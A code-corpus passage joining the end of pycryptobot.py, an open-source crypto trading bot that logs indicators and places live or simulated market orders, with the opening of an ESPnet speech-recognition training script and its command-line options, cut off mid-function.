obv_prefix = 'v '
obv_suffix = ' v | '
if not app.isVerbose():
if state.last_action != '':
output_text = formatted_current_df_index + ' | ' + app.getMarket() + bullbeartext + ' | ' + \
app.printGranularity() + ' | ' + price_text + ' | ' + ema_co_prefix + \
ema_text + ema_co_suffix + ' | ' + macd_co_prefix + macd_text + macd_co_suffix + \
obv_prefix + obv_text + obv_suffix + state.eri_text + ' | ' + state.action + \
' | Last Action: ' + state.last_action
else:
output_text = formatted_current_df_index + ' | ' + app.getMarket() + bullbeartext + ' | ' + \
app.printGranularity() + ' | ' + price_text + ' | ' + ema_co_prefix + \
ema_text + ema_co_suffix + ' | ' + macd_co_prefix + macd_text + macd_co_suffix + \
obv_prefix + obv_text + obv_suffix + state.eri_text + ' | ' + state.action + ' '
if state.last_action == 'BUY':
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
output_text += ' | ' + margin_text + ' (delta: ' + str(round(price - state.last_buy_price, precision)) + ')'
Logger.info(output_text)
# Seasonal Autoregressive Integrated Moving Average (ARIMA) model (ML prediction for 3 intervals from now)
if not app.isSimulation():
try:
prediction = technical_analysis.seasonalARIMAModelPrediction(int(app.getGranularity() / 60) * 3) # 3 intervals from now
Logger.info(f'Seasonal ARIMA model predicts the closing price will be {str(round(prediction[1], 2))} at {prediction[0]} (delta: {round(prediction[1] - price, 2)})')
except:
pass
if state.last_action == 'BUY':
# display support, resistance and fibonacci levels
Logger.info(technical_analysis.printSupportResistanceFibonacciLevels(price))
else:
Logger.debug('-- Iteration: ' + str(state.iterations) + ' --' + bullbeartext)
if state.last_action == 'BUY':
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
Logger.debug('-- Margin: ' + margin_text + ' --')
Logger.debug('price: ' + truncate(price))
Logger.debug('ema12: ' + truncate(float(df_last['ema12'].values[0])))
Logger.debug('ema26: ' + truncate(float(df_last['ema26'].values[0])))
Logger.debug('ema12gtema26co: ' + str(ema12gtema26co))
Logger.debug('ema12gtema26: ' + str(ema12gtema26))
Logger.debug('ema12ltema26co: ' + str(ema12ltema26co))
Logger.debug('ema12ltema26: ' + str(ema12ltema26))
Logger.debug('sma50: ' + truncate(float(df_last['sma50'].values[0])))
Logger.debug('sma200: ' + truncate(float(df_last['sma200'].values[0])))
Logger.debug('macd: ' + truncate(float(df_last['macd'].values[0])))
Logger.debug('signal: ' + truncate(float(df_last['signal'].values[0])))
Logger.debug('macdgtsignal: ' + str(macdgtsignal))
Logger.debug('macdltsignal: ' + str(macdltsignal))
Logger.debug('obv: ' + str(obv))
Logger.debug('obv_pc: ' + str(obv_pc))
Logger.debug('action: ' + state.action)
# informational output on the most recent entry
Logger.info('')
Logger.info('================================================================================')
txt = ' Iteration : ' + str(state.iterations) + bullbeartext
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Timestamp : ' + str(df_last.index.format()[0])
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' Close : ' + truncate(price)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' EMA12 : ' + truncate(float(df_last['ema12'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' EMA26 : ' + truncate(float(df_last['ema26'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Crossing Above : ' + str(ema12gtema26co)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Above : ' + str(ema12gtema26)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Crossing Below : ' + str(ema12ltema26co)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Below : ' + str(ema12ltema26)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
if (ema12gtema26 is True and ema12gtema26co is True):
txt = ' Condition : EMA12 is currently crossing above EMA26'
elif (ema12gtema26 is True and ema12gtema26co is False):
txt = ' Condition : EMA12 is currently above EMA26 and has crossed over'
elif (ema12ltema26 is True and ema12ltema26co is True):
txt = ' Condition : EMA12 is currently crossing below EMA26'
elif (ema12ltema26 is True and ema12ltema26co is False):
txt = ' Condition : EMA12 is currently below EMA26 and has crossed over'
else:
txt = ' Condition : -'
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' SMA20 : ' + truncate(float(df_last['sma20'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' SMA200 : ' + truncate(float(df_last['sma200'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' MACD : ' + truncate(float(df_last['macd'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Signal : ' + truncate(float(df_last['signal'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Above : ' + str(macdgtsignal)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Below : ' + str(macdltsignal)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
if (macdgtsignal is True and macdgtsignalco is True):
txt = ' Condition : MACD is currently crossing above Signal'
elif (macdgtsignal is True and macdgtsignalco is False):
txt = ' Condition : MACD is currently above Signal and has crossed over'
elif (macdltsignal is True and macdltsignalco is True):
txt = ' Condition : MACD is currently crossing below Signal'
elif (macdltsignal is True and macdltsignalco is False):
txt = ' Condition : MACD is currently below Signal and has crossed over'
else:
txt = ' Condition : -'
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' Action : ' + state.action
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('================================================================================')
if state.last_action == 'BUY':
txt = ' Margin : ' + margin_text
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('================================================================================')
# if a buy signal
if state.action == 'BUY':
state.last_buy_price = price
state.last_buy_high = state.last_buy_price
# if live
if app.isLive():
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') BUY at ' + price_text)
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | BUY')
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing LIVE Buy Order *** |')
Logger.info('--------------------------------------------------------------------------------')
# display balances
Logger.info(app.getBaseCurrency() + ' balance before order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance before order: ' + str(account.getBalance(app.getQuoteCurrency())))
# execute a live market buy
state.last_buy_size = float(account.getBalance(app.getQuoteCurrency()))
if app.getBuyMaxSize() and state.last_buy_size > app.getBuyMaxSize():
state.last_buy_size = app.getBuyMaxSize()
resp = app.marketBuy(app.getMarket(), state.last_buy_size, app.getBuyPercent())
Logger.debug(resp)
# display balances
Logger.info(app.getBaseCurrency() + ' balance after order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance after order: ' + str(account.getBalance(app.getQuoteCurrency())))
# if not live
else:
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') TEST BUY at ' + price_text)
# TODO: Improve simulator calculations by including calculations for buy and sell limit configurations.
if state.last_buy_size == 0 and state.last_buy_filled == 0:
state.last_buy_size = 1000
state.first_buy_size = 1000
state.buy_count = state.buy_count + 1
state.buy_sum = state.buy_sum + state.last_buy_size
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | BUY')
bands = technical_analysis.getFibonacciRetracementLevels(float(price))
Logger.info(' Fibonacci Retracement Levels:' + str(bands))
technical_analysis.printSupportResistanceLevel(float(price))
if len(bands) >= 1 and len(bands) <= 2:
if len(bands) == 1:
first_key = list(bands.keys())[0]
if first_key == 'ratio1':
state.fib_low = 0
state.fib_high = bands[first_key]
if first_key == 'ratio1_618':
state.fib_low = bands[first_key]
state.fib_high = bands[first_key] * 2
else:
state.fib_low = bands[first_key]
elif len(bands) == 2:
first_key = list(bands.keys())[0]
second_key = list(bands.keys())[1]
state.fib_low = bands[first_key]
state.fib_high = bands[second_key]
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing TEST Buy Order *** |')
Logger.info('--------------------------------------------------------------------------------')
if app.shouldSaveGraphs():
tradinggraphs = TradingGraphs(technical_analysis)
ts = datetime.now().timestamp()
filename = app.getMarket() + '_' + app.printGranularity() + '_buy_' + str(ts) + '.png'
tradinggraphs.renderEMAandMACD(len(trading_data), 'graphs/' + filename, True)
# if a sell signal
elif state.action == 'SELL':
# if live
if app.isLive():
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') SELL at ' +
price_text + ' (margin: ' + margin_text + ', (delta: ' +
str(round(price - state.last_buy_price, precision)) + ')')
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | SELL')
bands = technical_analysis.getFibonacciRetracementLevels(float(price))
Logger.info(' Fibonacci Retracement Levels:' + str(bands))
if len(bands) >= 1 and len(bands) <= 2:
if len(bands) == 1:
first_key = list(bands.keys())[0]
if first_key == 'ratio1':
state.fib_low = 0
state.fib_high = bands[first_key]
if first_key == 'ratio1_618':
state.fib_low = bands[first_key]
state.fib_high = bands[first_key] * 2
else:
state.fib_low = bands[first_key]
elif len(bands) == 2:
first_key = list(bands.keys())[0]
second_key = list(bands.keys())[1]
state.fib_low = bands[first_key]
state.fib_high = bands[second_key]
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing LIVE Sell Order *** |')
Logger.info('--------------------------------------------------------------------------------')
# display balances
Logger.info(app.getBaseCurrency() + ' balance before order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance before order: ' + str(account.getBalance(app.getQuoteCurrency())))
# execute a live market sell
resp = app.marketSell(app.getMarket(), float(account.getBalance(app.getBaseCurrency())),
app.getSellPercent())
Logger.debug(resp)
# display balances
Logger.info(app.getBaseCurrency() + ' balance after order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance after order: ' + str(account.getBalance(app.getQuoteCurrency())))
# if not live
else:
margin, profit, sell_fee = calculate_margin(
buy_size=state.last_buy_size,
buy_filled=state.last_buy_filled,
buy_price=state.last_buy_price,
buy_fee=state.last_buy_fee,
sell_percent=app.getSellPercent(),
sell_price=price,
sell_taker_fee=app.getTakerFee())
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') TEST SELL at ' +
price_text + ' (margin: ' + margin_text + ', (delta: ' +
str(round(price - state.last_buy_price, precision)) + ')')
# Preserve next buy values for simulator
state.sell_count = state.sell_count + 1
buy_size = ((app.getSellPercent() / 100) * ((price / state.last_buy_price) * (state.last_buy_size - state.last_buy_fee)))
state.last_buy_size = buy_size - sell_fee
state.sell_sum = state.sell_sum + state.last_buy_size
if not app.isVerbose():
if price > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' +
app.printGranularity() + ' | SELL | ' + str(price) + ' | BUY | ' +
str(state.last_buy_price) + ' | DIFF | ' + str(price - state.last_buy_price) +
' | DIFF | ' + str(profit) + ' | MARGIN NO FEES | ' +
margin_text + ' | MARGIN FEES | ' + str(round(sell_fee, precision)))
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing TEST Sell Order *** |')
Logger.info('--------------------------------------------------------------------------------')
if app.shouldSaveGraphs():
tradinggraphs = TradingGraphs(technical_analysis)
ts = datetime.now().timestamp()
filename = app.getMarket() + '_' + app.printGranularity() + '_sell_' + str(ts) + '.png'
tradinggraphs.renderEMAandMACD(len(trading_data), 'graphs/' + filename, True)
# last significant action
if state.action in ['BUY', 'SELL']:
state.last_action = state.action
state.last_df_index = str(df_last.index.format()[0])
if not app.isLive() and state.iterations == len(df):
Logger.info("\nSimulation Summary: ")
if state.buy_count > state.sell_count and app.allowSellAtLoss():
# Calculate last sell size
state.last_buy_size = ((app.getSellPercent() / 100) * ((price / state.last_buy_price) * (state.last_buy_size - state.last_buy_fee)))
# Reduce sell fee from last sell size
state.last_buy_size = state.last_buy_size - state.last_buy_price * app.getTakerFee()
state.sell_sum = state.sell_sum + state.last_buy_size
state.sell_count = state.sell_count + 1
elif state.buy_count > state.sell_count and not app.allowSellAtLoss():
Logger.info("\n")
Logger.info(' Note : "sell at loss" is disabled and you have an open trade, if the margin')
Logger.info(' result below is negative it will assume you sold at the end of the')
Logger.info(' simulation which may not be ideal. Try setting --sellatloss 1')
Logger.info("\n")
Logger.info(' Buy Count : ' + str(state.buy_count))
Logger.info(' Sell Count : ' + str(state.sell_count))
Logger.info(' First Buy : ' + str(state.first_buy_size))
Logger.info(' Last Sell : ' + str(state.last_buy_size))
app.notifyTelegram(f"Simulation Summary\n Buy Count: {state.buy_count}\n Sell Count: {state.sell_count}\n First Buy: {state.first_buy_size}\n Last Sell: {state.last_buy_size}\n")
if state.sell_count > 0:
Logger.info("\n")
Logger.info(' Margin : ' + _truncate((((state.last_buy_size - state.first_buy_size) / state.first_buy_size) * 100), 4) + '%')
Logger.info("\n")
Logger.info(' ** non-live simulation, assuming highest fees')
app.notifyTelegram(f" Margin: {_truncate((((state.last_buy_size - state.first_buy_size) / state.first_buy_size) * 100), 4)}%\n ** non-live simulation, assuming highest fees\n")
else:
if state.last_buy_size > 0 and state.last_buy_price > 0 and price > 0 and state.last_action == 'BUY':
# show profit and margin if already bought
Logger.info(now + ' | ' + app.getMarket() + bullbeartext + ' | ' + app.printGranularity() + ' | Current Price: ' + str(price) + ' | Margin: ' + str(margin) + ' | Profit: ' + str(profit))
else:
Logger.info(now + ' | ' + app.getMarket() + bullbeartext + ' | ' + app.printGranularity() + ' | Current Price: ' + str(price))
# decrement ignored iteration
state.iterations = state.iterations - 1
# if live
if not app.disableTracker() and app.isLive():
# update order tracker csv
if app.getExchange() == 'binance':
account.saveTrackerCSV(app.getMarket())
elif app.getExchange() == 'coinbasepro':
account.saveTrackerCSV()
if app.isSimulation():
if state.iterations < 300:
if app.simuluationSpeed() in ['fast', 'fast-sample']:
# fast processing
list(map(s.cancel, s.queue))
s.enter(0, 1, executeJob, (sc, app, state, df))
else:
# slow processing
list(map(s.cancel, s.queue))
s.enter(1, 1, executeJob, (sc, app, state, df))
else:
# poll every 1 minute
list(map(s.cancel, s.queue))
s.enter(60, 1, executeJob, (sc, app, state))
def main():
try:
message = 'Starting '
if app.getExchange() == 'coinbasepro':
message += 'Coinbase Pro bot'
elif app.getExchange() == 'binance':
message += 'Binance bot'
message += ' for ' + app.getMarket() + ' using granularity ' + app.printGranularity()
app.notifyTelegram(message)
# initialise and start application
trading_data = app.startApp(account, state.last_action)
def runApp():
# run the first job immediately after starting
if app.isSimulation():
executeJob(s, app, state, trading_data)
else:
executeJob(s, app, state)
s.run()
try:
runApp()
except KeyboardInterrupt:
raise
except(BaseException, Exception) as e:
if app.autoRestart():
# Wait 30 second and try to relaunch application
time.sleep(30)
Logger.critical('Restarting application after exception: ' + repr(e))
app.notifyTelegram('Auto restarting bot for ' + app.getMarket() + ' after exception: ' + repr(e))
# Cancel the events queue
map(s.cancel, s.queue)
# Restart the app
runApp()
else:
raise
# catches a keyboard break of app, exits gracefully
except KeyboardInterrupt:
Logger.warning(str(datetime.now()) + ' bot is closed via keyboard interrupt...')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
except(BaseException, Exception) as e:
# catch all not managed exceptions and send a Telegram message if configured
app.notifyTelegram('Bot for ' + app.getMarket() + ' got an exception: ' + repr(e))
Logger.critical(repr(e))
raise
main()
| 51.137376 | 202 | 0.504417 | [
"Apache-2.0"
] | treggit/pycryptobot | pycryptobot.py | 41,319 | Python |
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Automatic speech recognition model training script."""
import logging
import os
import random
import subprocess
import sys
from distutils.version import LooseVersion
import configargparse
import numpy as np
import torch
from espnet.utils.cli_utils import strtobool
from espnet.utils.training.batchfy import BATCH_COUNT_CHOICES
is_torch_1_2_plus = LooseVersion(torch.__version__) >= LooseVersion("1.2")
# NOTE: you need this func to generate our sphinx doc
def get_parser(parser=None, required=True):
"""Get default arguments."""
if parser is None:
parser = configargparse.ArgumentParser(
description="Train an automatic speech recognition (ASR) model on one CPU, "
"one or multiple GPUs",
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter,
)
# general configuration
parser.add("--config", is_config_file=True, help="config file path")
parser.add(
"--config2",
is_config_file=True,
help="second config file path that overwrites the settings in `--config`.",
)
parser.add(
"--config3",
is_config_file=True,
help="third config file path that overwrites the settings in "
"`--config` and `--config2`.",
)
parser.add_argument(
"--ngpu",
default=None,
type=int,
help="Number of GPUs. If not given, use all visible devices",
)
parser.add_argument(
"--train-dtype",
default="float32",
choices=["float16", "float32", "float64", "O0", "O1", "O2", "O3"],
help="Data type for training (only pytorch backend). "
"O0,O1,.. flags require apex. "
"See https://nvidia.github.io/apex/amp.html#opt-levels",
)
parser.add_argument(
"--backend",
default="chainer",
type=str,
choices=["chainer", "pytorch"],
help="Backend library",
)
parser.add_argument(
"--outdir", type=str, required=required, help="Output directory"
)
parser.add_argument("--debugmode", default=1, type=int, help="Debugmode")
parser.add_argument("--dict", required=required, help="Dictionary")
parser.add_argument("--seed", default=1, type=int, help="Random seed")
parser.add_argument("--debugdir", type=str, help="Output directory for debugging")
parser.add_argument(
"--resume",
"-r",
default="",
nargs="?",
help="Resume the training from snapshot",
)
parser.add_argument(
"--minibatches",
"-N",
type=int,
default="-1",
help="Process only N minibatches (for debug)",
)
parser.add_argument("--verbose", "-V", default=0, type=int, help="Verbose option")
parser.add_argument(
"--tensorboard-dir",
default=None,
type=str,
nargs="?",
help="Tensorboard log dir path",
)
parser.add_argument(
"--report-interval-iters",
default=100,
type=int,
help="Report interval iterations",
)
parser.add_argument(
"--save-interval-iters",
default=0,
type=int,
help="Save snapshot interval iterations",
)
# task related
parser.add_argument(
"--train-json",
type=str,
default=None,
help="Filename of train label data (json)",
)
parser.add_argument(
"--valid-json",
type=str,
default=None,
help="Filename of validation label data (json)",
)
# network architecture
parser.add_argument(
"--model-module",
type=str,
default=None,
help="model defined module (default: espnet.nets.xxx_backend.e2e_asr:E2E)",
)
# encoder
parser.add_argument(
"--num-encs", default=1, type=int, help="Number of encoders in the model."
)
# loss related
parser.add_argument(
"--ctc_type",
default="warpctc",
type=str,
choices=["builtin", "warpctc"],
help="Type of CTC implementation to calculate loss.",
)
parser.add_argument(
"--mtlalpha",
default=0.5,
type=float,
help="Multitask learning coefficient, "
"alpha: alpha*ctc_loss + (1-alpha)*att_loss ",
)
parser.add_argument(
"--lsm-weight", default=0.0, type=float, help="Label smoothing weight"
)
# recognition options to compute CER/WER
parser.add_argument(
"--report-cer",
default=False,
action="store_true",
help="Compute CER on development set",
)
parser.add_argument(
"--report-wer",
default=False,
action="store_true",
help="Compute WER on development set",
)
parser.add_argument("--nbest", type=int, default=1, help="Output N-best hypotheses")
parser.add_argument("--beam-size", type=int, default=4, help="Beam size")
parser.add_argument("--penalty", default=0.0, type=float, help="Incertion penalty")
parser.add_argument(
"--maxlenratio",
default=0.0,
type=float,
help="""Input length ratio to obtain max output length.
If maxlenratio=0.0 (default), it uses a end-detect function
to automatically find maximum hypothesis lengths""",
)
parser.add_argument(
"--minlenratio",
default=0.0,
type=float,
help="Input length ratio to obtain min output length",
)
parser.add_argument(
"--ctc-weight", default=0.3, type=float, help="CTC weight in joint decoding"
)
parser.add_argument(
"--rnnlm", type=str, default=None, help="RNNLM model file to read"
)
parser.add_argument(
"--rnnlm-conf", type=str, default=None, help="RNNLM model config file to read"
)
parser.add_argument("--lm-weight", default=0.1, type=float, help="RNNLM weight.")
parser.add_argument("--sym-space", default="<space>", type=str, help="Space symbol")
parser.add_argument("--sym-blank", default="<blank>", type=str, help="Blank symbol")
# minibatch related
parser.add_argument(
"--sortagrad",
default=0,
type=int,
nargs="?",
help="How many epochs to use sortagrad for. 0 = deactivated, -1 = all epochs",
)
parser.add_argument(
"--batch-count",
default="auto",
choices=BATCH_COUNT_CHOICES,
help="How to count batch_size. "
"The default (auto) will find how to count by args.",
)
parser.add_argument(
"--batch-size",
"--batch-seqs",
"-b",
default=0,
type=int,
help="Maximum seqs in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-bins",
default=0,
type=int,
help="Maximum bins in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-in",
default=0,
type=int,
help="Maximum input frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-out",
default=0,
type=int,
help="Maximum output frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-inout",
default=0,
type=int,
help="Maximum input+output frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--maxlen-in",
"--batch-seq-maxlen-in",
default=800,
type=int,
metavar="ML",
help="When --batch-count=seq, "
"batch size is reduced if the input sequence length > ML.",
)
parser.add_argument(
"--maxlen-out",
"--batch-seq-maxlen-out",
default=150,
type=int,
metavar="ML",
help="When --batch-count=seq, "
"batch size is reduced if the output sequence length > ML",
)
parser.add_argument(
"--n-iter-processes",
default=0,
type=int,
help="Number of processes of iterator",
)
parser.add_argument(
"--preprocess-conf",
type=str,
default=None,
nargs="?",
help="The configuration file for the pre-processing",
)
# optimization related
parser.add_argument(
"--opt",
default="adadelta",
type=str,
choices=["adadelta", "adam", "noam"],
help="Optimizer",
)
parser.add_argument(
"--accum-grad", default=1, type=int, help="Number of gradient accumuration"
)
parser.add_argument(
"--eps", default=1e-8, type=float, help="Epsilon constant for optimizer"
)
parser.add_argument(
"--eps-decay", default=0.01, type=float, help="Decaying ratio of epsilon"
)
parser.add_argument(
"--weight-decay", default=0.0, type=float, help="Weight decay ratio"
)
parser.add_argument(
"--criterion",
default="acc",
type=str,
choices=["loss", "acc"],
help="Criterion to perform epsilon decay",
)
parser.add_argument(
"--threshold", default=1e-4, type=float, help="Threshold to stop iteration"
)
parser.add_argument(
"--epochs", "-e", default=30, type=int, help="Maximum number of epochs"
)
parser.add_argument(
"--early-stop-criterion",
default="validation/main/acc",
type=str,
nargs="?",
help="Value to monitor to trigger an early stopping of the training",
)
parser.add_argument(
"--patience",
default=3,
type=int,
nargs="?",
help="Number of epochs to wait without improvement "
"before stopping the training",
)
parser.add_argument(
"--grad-clip", default=5, type=float, help="Gradient norm threshold to clip"
)
parser.add_argument(
"--num-save-attention",
default=3,
type=int,
help="Number of samples of attention to be saved",
)
parser.add_argument(
"--num-save-ctc",
default=3,
type=int,
help="Number of samples of CTC probability to be saved",
)
parser.add_argument(
"--grad-noise",
type=strtobool,
default=False,
help="The flag to switch to use noise injection to gradients during training",
)
# asr_mix related
parser.add_argument(
"--num-spkrs",
default=1,
type=int,
choices=[1, 2],
help="Number of speakers in the speech.",
)
# decoder related
parser.add_argument(
"--context-residual",
default=False,
type=strtobool,
nargs="?",
help="The flag to switch to use context vector residual in the decoder network",
)
# finetuning related
parser.add_argument(
"--enc-init",
default=None,
type=str,
help="Pre-trained ASR model to initialize encoder.",
)
parser.add_argument(
"--enc-init-mods",
default="enc.enc.",
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of encoder modules to initialize, separated by a comma.",
)
parser.add_argument(
"--dec-init",
default=None,
type=str,
help="Pre-trained ASR, MT or LM model to initialize decoder.",
)
parser.add_argument(
"--dec-init-mods",
default="att., dec.",
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of decoder modules to initialize, separated by a comma.",
)
parser.add_argument(
"--freeze-mods",
default=None,
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of modules to freeze, separated by a comma.",
)
# front end related
parser.add_argument(
"--use-frontend",
type=strtobool,
default=False,
help="The flag to switch to use frontend system.",
)
# WPE related
parser.add_argument(
"--use-wpe",
type=strtobool,
default=False,
help="Apply Weighted Prediction Error",
)
parser.add_argument(
"--wtype",
default="blstmp",
type=str,
choices=[
"lstm",
"blstm",
"lstmp",
"blstmp",
"vgglstmp",
"vggblstmp",
"vgglstm",
"vggblstm",
"gru",
"bgru",
"grup",
"bgrup",
"vgggrup",
"vggbgrup",
"vgggru",
"vggbgru",
],
help="Type of encoder network architecture "
"of the mask estimator for WPE. "
"",
)
parser.add_argument("--wlayers", type=int, default=2, help="")
parser.add_argument("--wunits", type=int, default=300, help="")
parser.add_argument("--wprojs", type=int, default=300, help="")
parser.add_argument("--wdropout-rate", type=float, default=0.0, help="")
parser.add_argument("--wpe-taps", type=int, default=5, help="")
parser.add_argument("--wpe-delay", type=int, default=3, help="")
parser.add_argument(
"--use-dnn-mask-for-wpe",
type=strtobool,
default=False,
help="Use DNN to estimate the power spectrogram. "
"This option is experimental.",
)
# Beamformer related
parser.add_argument("--use-beamformer", type=strtobool, default=True, help="")
parser.add_argument(
"--btype",
default="blstmp",
type=str,
choices=[
"lstm",
"blstm",
"lstmp",
"blstmp",
"vgglstmp",
"vggblstmp",
"vgglstm",
"vggblstm",
"gru",
"bgru",
"grup",
"bgrup",
"vgggrup",
"vggbgrup",
"vgggru",
"vggbgru",
],
help="Type of encoder network architecture "
"of the mask estimator for Beamformer.",
)
parser.add_argument("--blayers", type=int, default=2, help="")
parser.add_argument("--bunits", type=int, default=300, help="")
parser.add_argument("--bprojs", type=int, default=300, help="")
parser.add_argument("--badim", type=int, default=320, help="")
parser.add_argument(
"--bnmask",
type=int,
default=2,
help="Number of beamforming masks, " "default is 2 for [speech, noise].",
)
parser.add_argument(
"--ref-channel",
type=int,
default=-1,
help="The reference channel used for beamformer. "
"By default, the channel is estimated by DNN.",
)
parser.add_argument("--bdropout-rate", type=float, default=0.0, help="")
# Feature transform: Normalization
parser.add_argument(
"--stats-file",
type=str,
default=None,
help="The stats file for the feature normalization",
)
parser.add_argument(
"--apply-uttmvn",
type=strtobool,
default=True,
help="Apply utterance level mean " "variance normalization.",
)
parser.add_argument("--uttmvn-norm-means", type=strtobool, default=True, help="")
parser.add_argument("--uttmvn-norm-vars", type=strtobool, default=False, help="")
# Feature transform: Fbank
parser.add_argument(
"--fbank-fs",
type=int,
default=16000,
help="The sample frequency used for " "the mel-fbank creation.",
)
parser.add_argument(
"--n-mels", type=int, default=80, help="The number of mel-frequency bins."
)
parser.add_argument("--fbank-fmin", type=float, default=0.0, help="")
parser.add_argument("--fbank-fmax", type=float, default=None, help="")
return parser
def main(cmd_args):
"""Run the main training function."""
parser = get_parser()
args, _ = parser.parse_known_args(cmd_args)
if args.backend == "chainer" and args.train_dtype != "float32":
raise NotImplementedError(
f"chainer backend does not support --train-dtype {args.train_dtype}."
"Use --dtype float32."
)
if args.ngpu == 0 and args.train_dtype in ("O0", "O1", "O2", "O3", "float16"):
raise ValueError(
f"--train-dtype {args.train_dtype} does not support the CPU backend."
)
from espnet.utils.dynamic_import import dynamic_import
if args.model_module is None:
model_module = "espnet.nets." + args.backend + "_backend.e2e_asr:E2E"
else:
model_module = args.model_module
model_class = dynamic_import(model_module)
model_class.add_arguments(parser)
args = parser.parse_args(cmd_args)
args.model_module = model_module
if "chainer_backend" in args.model_module:
args.backend = "chainer"
if "pytorch_backend" in args.model_module:
args.backend = "pytorch"
# logging info
if args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# If --ngpu is not given,
# 1. if CUDA_VISIBLE_DEVICES is set, all visible devices
# 2. if nvidia-smi exists, use all devices
# 3. else ngpu=0
if args.ngpu is None:
cvd = os.environ.get("CUDA_VISIBLE_DEVICES")
if cvd is not None:
ngpu = len(cvd.split(","))
else:
logging.warning("CUDA_VISIBLE_DEVICES is not set.")
try:
p = subprocess.run(
["nvidia-smi", "-L"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
except (subprocess.CalledProcessError, FileNotFoundError):
ngpu = 0
else:
ngpu = len(p.stderr.decode().split("\n")) - 1
else:
if is_torch_1_2_plus and args.ngpu != 1:
logging.debug(
"There are some bugs with multi-GPU processing in PyTorch 1.2+"
+ " (see https://github.com/pytorch/pytorch/issues/21108)"
)
ngpu = args.ngpu
logging.info(f"ngpu: {ngpu}")
# display PYTHONPATH
logging.info("python path = " + os.environ.get("PYTHONPATH", "(None)"))
# set random seed
logging.info("random seed = %d" % args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
# load dictionary for debug log
if args.dict is not None:
with open(args.dict, "rb") as f:
dictionary = f.readlines()
char_list = [entry.decode("utf-8").split(" ")[0] for entry in dictionary]
char_list.insert(0, "<blank>")
char_list.append("<eos>")
# for non-autoregressive training using Transformer
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
char_list.append("<mask>")
args.char_list = char_list
else:
args.char_list = None
# train
logging.info("backend = " + args.backend)
if args.num_spkrs == 1:
if args.backend == "chainer":
from espnet.asr.chainer_backend.asr import train
train(args)
